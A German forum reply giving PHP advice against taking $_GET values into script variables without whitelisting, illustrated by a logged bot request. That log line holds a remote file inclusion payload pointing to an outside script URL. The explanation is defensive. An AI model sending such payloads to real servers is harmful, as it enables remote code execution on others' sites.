nicht angemeldet
hallo Tim(ur),
Erstmal, verzeih einen Ausländer und dass es statt Formular das Wort Form benutzt hatte.
Mir war das nicht ganz klar, was deine Muttersprache ist. Wenn ich es nun weiß, fällt das Verzeihen aber nicht schwer, und ich brauche keinen "bissigen Kommentar" zu schreiben.
Und wenn du schon schreibst, dass man lieber $_GET[] nicht benutzen sollte, könntest du gleich eine Alternative vorschlagen :)
Schau dir einfach mal an, welche vordefinierten Variablen es gibt. Natürlich gibt es auch Einsatzgebiete für $_GET[], aber man sollte _niemals_ einen auf diese Weise übergebenen Wert so einfach in eine Variable des eigenen Scripts übernehmen. Der Grund: es gibt eine Menge "bots" im Internet, die wahllos versuchen, an gefundene PHP-Scripts Parameter anzuhängen. Ich finde zum Beispiel in meinen logs jede Menge Einträge der Art:
216.32.86.218 - - [23/Oct/2007:22:39:04 +0200] "GET /index.php?textfield=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 200 2068 "-" "libwww-perl/5.808"
Hier hat jemand versucht, an "GET" den Aufruf eines "bösen" Scripts anzuhängen. Wenn ich das nun ganz einfach in "meine" Variable übernommen hätte, wäre dieses Script möglicherweise ausgeführt worden und hätte ein paar hundert andere Leute geärgert - ohne daß _ich_ davon was mitbekommen hätte.
Du kannst aber nun prüfen, welche Dinge in dem mit GET oder POST übergebenen String stehen dürfen. Wenn da irgendwas drinsteht, was du nicht willst (und das ist leider sehr häufig der Fall), kannst du festlegen, daß dein Script ganz einfach gar nichts tut. Nur wenn das drinsteht, was dein Script als "zulässig" wertet, solltest du die übergebenen Zeichen auch in deine Variable übernehmen.
Leider hat sich diese Vorgehensweise bisher noch nicht überall durchgesetzt, was zur Wirksamkeit einiger aktueller "bots" (in der Regel Spam, es gibt aber auch schlimmere) entscheidend beiträgt. Ich habe pro Tag deutlich über hundert solcher "verbotener" Zugriffe. Die kriegen zwar eine ganz freundlich klingende Servermeldung 200 zurück, aber passiert ist trotzdem nix.
Ist nicht böse gemeint
Ist auch nicht so angekommen.
Grüße aus Berlin
Christoph S.